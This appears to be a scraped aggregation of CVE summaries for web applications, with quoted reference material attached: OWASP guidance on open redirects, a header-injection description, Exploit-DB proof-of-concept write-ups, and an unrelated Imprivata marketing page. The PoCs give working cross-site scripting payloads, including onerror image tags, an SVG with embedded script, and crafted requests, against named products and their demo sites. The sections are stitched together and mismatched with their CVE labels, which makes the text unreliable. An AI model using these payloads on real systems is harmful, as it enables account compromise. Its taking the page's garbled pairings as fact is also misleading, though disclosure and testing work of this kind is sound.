SeedDMS v6.0.15 was discovered to contain an open redirect vulnerability. An attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking the victim users to click on crafted links.

**Testing for Client Side URL Redirect**

ID

WSTG-CLNT-04

**Summary**

This section describes how to check for client side URL redirection, also known as open redirection. It is an input validation flaw that exists when an application accepts user-controlled input that specifies a link which leads to an external URL that could be malicious. This kind of vulnerability could be used to accomplish a phishing attack or redirect a victim to an infection page.

This vulnerability occurs when an application accepts untrusted input that contains a URL value and does not sanitize it. This URL value could cause the web application to redirect the user to another page, such as a malicious page controlled by the attacker.

This vulnerability may enable an attacker to successfully launch a phishing scam and steal user credentials. Since the redirection is originated by the real application, the phishing attempts may have a more trustworthy appearance.

Here is an example of a phishing attack URL.

    http://www.target.site?#redirect=www.fake-target.site
    

The victim that visits this URL will be automatically redirected to fake-target.site, where an attacker could place a fake page that resembles the intended site, in order to steal the victim’s credentials.

Open redirection could also be used to craft a URL that would bypass the application’s access control checks and forward the attacker to privileged functions that they would normally not be able to access.

**How to Test**

When testers manually check for this type of vulnerability, they first identify if there are client side redirections implemented in the client side code. These redirections may be implemented, to give a JavaScript example, using the window.location object. This can be used to direct the browser to another page by simply assigning a string to it. This is demonstrated in the following snippet:

    var redir = location.hash.substring(1);
    if (redir)
        window.location='http://'+decodeURIComponent(redir);
    

In this example, the script does not perform any validation of the variable redir which contains the user-supplied input via the query string. Since no form of encoding is applied, this unvalidated input is passed to the windows.location object, creating a URL redirection vulnerability.

This implies that an attacker could redirect the victim to a malicious site simply by submitting the following query string:

    http://www.victim.site/?#www.malicious.site
    

With a slight modification, the above example snippet can be vulnerable to JavaScript injection.

    var redir = location.hash.substring(1);
    if (redir)
        window.location=decodeURIComponent(redir);
    

This can be exploited by submitting the following query string:

    http://www.victim.site/?#javascript:alert(document.cookie)
    

When testing for this vulnerability, consider that some characters are treated differently by different browsers. For reference, see DOM-based XSS.

CVE-2021-39425: WSTG - v4.1 | OWASP Foundation

A HTTP response header injection vulnerability in Swoole v4.5.2 allows attackers to execute arbitrary code via supplying a crafted URL.

**Description: HTTP response header injection**

HTTP response header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP response header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via response header injection, because the attacker can construct a request that causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage response header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request that results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL, which will compromise other users who request that URL in future.

**Remediation: HTTP response header injection**

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent response header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

**Vulnerability classifications**

*   CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')
*   CAPEC-34: HTTP Response Splitting

**Typical severity**

High

**Type index (hex)**

0x00200200

**Type index (decimal)**

2097664

CVE-2020-24275: HTTP response header injection

A vulnerability classified as problematic has been found in Bug Finder ChainCity Real Estate Investment Platform 1.0. Affected is an unknown function of the file /chaincity/user/ticket/create of the component New Ticket Handler. The manipulation of the argument subject leads to cross site scripting. It is possible to launch the attack remotely. VDB-235062 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-3794

A Cross-Site Request Forgery (CSRF) in the Admin portal of Cockpit CMS v2.5.2 allows attackers to execute arbitrary Administrator commands.

CVE-2023-37650: Multiple Vulnerabilities in Cockpit CMS <= v2.5.2

An arbitrary file upload vulnerability in the component /workplace#!explorer of Alkacon OpenCMS v15.0 allows attackers to execute arbitrary code via uploading a crafted PNG file.

    # Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
    # Date: 1/07/2023
    # Exploit Author: tmrswrr
    # Vendor Homepage: http://www.opencms.org
    # Software Link: https://github.com/alkacon/opencms-core
    # Version: v15.0
    
    
    POC:
    
    1 ) Login in demo page , go to this url
    https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!!
    2 ) Click /.galleries/ , after right click any png file  , open gallery, write in search button this payload
    <img src=. onerror=alert(document.domain)>
    3 ) You will be see alert box
    
    POC:
    
    1 ) Go to this url , right click any png file, rename title section and write your payload :  <img src=. onerror=alert(document.domain)>
    https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!!
    2 ) You will be see alert box , stored xss 
    
    POC:
    
    1 ) Go to this url , right click any png file and choose replace , click change file and choose your svg file
    after save it 
    
    svg file:
    
    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
      <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
      <script type="text/javascript">
        alert("XSS");
      </script>
    </svg>
    
    2 ) When click this svg file you will be see alert button

CVE-2023-37602: OffSec’s Exploit Database Archive

Office Suite Premium Version v10.9.1.42602 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the filter parameter at /api?path=files.

    # Exploit Title: Office Suite Premium 10.9.1.42602 - Cross-Site Scripting (reflected)# Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POC# Exploit Details : Following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.Request 1: GET /api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Url: https://connect.mobisystems.com/api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-codePayload: <img src=a onerror=alert(1)>Parameter : applicationRequest 2 : GET /api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527 HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Lang: en_ENGdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19URL : https://connect.mobisystems.com/api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527Payload : <img src=a onerror=alert(1)>Parameter: idRequest 3 : GET /api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Lang: en_ENGdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19URL : https://connect.mobisystems.com/api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=searchPayload :<img src=a onerror=alert(1)>Parameter: filter

CVE-2023-38617: Office Suite Premium 10.9.1.42602 Cross Site Scripting ≈ Packet Storm

Diafan CMS v6.0 was discovered to contain a reflected cross-site scripting via the cat_id parameter at /shop/?module=shop&action=search.

    # Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)
    # Exploit Author: tmrswrr / Hulya Karabag
    # Vendor Homepage: https://www.diafancms.com/
    # Version: 6.0
    # Tested on: https://demo.diafancms.com
    
    
    Description:
    
    1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field:
    Payload : "><script>alert(document.domain)<%2Fscript>
    2) After will you see alert button : 
    https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0

CVE-2023-37164: OffSec’s Exploit Database Archive

Imprivata Privileged Access Management (formally Xton Privileged Access Management) 2.3.202112051108 allows XSS.

        

**Privileged access management**

Secure your most sensitive accounts in minutes with Imprivata Privileged Access Management

**Most security breaches involve compromised privileged credentials**

Privileged accounts — those with the highest level of access — pose a greater security risk than the average end user because of the degree of sensitive information that could be exposed. This risk isn’t lost on hackers, which is why 80% of security breaches involve compromised privileged credentials.

*   0
    
    hours saved
    
*   0
    
    years given back to users
    
*   0
    
    time savings
    

Skip list content

**Limit your attack surface**

Incorporate the principle of least privilege by providing just enough access to complete a task through granular policy control at the system level.

**Reduce TCO**

Get going in just minutes with a completely agentless architecture that helps you meet wide-ranging compliance requirements quickly.

**Simplify password management**

Secure and automate privileged password discovery, management, and rotation. Automatically randomize, manage, and vaults passwords and other credentials. 

**Enterprise password vault**

Securely store credentials, passwords, admin and service accounts, keys, and certificates in an AES-256 encrypted vault. Share access to internal, external, or remote resources without disclosing credentials.

**Privileged account security**

Minimize the risk of data breaches associated with compromised privileged credentials and meet wide-ranging regulatory compliance requirements such as GDPR, HIPAA, HITRUST, NIST, and more.

**Privileged access and authentication**

Ensure users are who they say they are before allowing access to privileged accounts with out-of-the-box integration with multifactor authentication.

Imprivata provides high-performance privileged access management both for the inside and the external administrators. It is easy to use, easy to deploy, and enables zero trust.

**How it works**

**See how Imprivata Privileged Access Management fits into the digital identity framework**

The Imprivata digital identity framework is your guide to a secure and efficient system for managing identities across borderless networks. Address the key requirements for a robust strategy with governance and administration, identity management, authorization, and access and authentication.

Skip list content

Infographics

A Continuing Crisis: Third-Party Access

Third-party vendors are an inevitable part of a business environment, which means third-party remote access is a necessity. But this privileged, third-party access and specifically, the risk involved, is a growing problem — and it’s a problem every single organization needs to solve.

View Now

        

Datasheets

Imprivata Privileged Access Management integration with Imprivata OneSign

Read Now

        

Case studies

Freeman Health System enables fast, efficient authentications and easy, secure third-party access

A large Missouri health system partners with Imprivata to implement a secure digital identity management solution that pleases staff, vendors, and cyber insurance providers alike

Read Now

Ready to see Imprivata Privileged Access Management in action?

CVE-2021-45094: Privileged access management

Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability.

CVE-2023-37728

A vulnerability has been found in Boom CMS 8.0.7 and classified as problematic. Affected by this vulnerability is the function add of the component assets-manager. The manipulation of the argument title/description leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235057 was assigned to this vulnerability.

Tag

#xss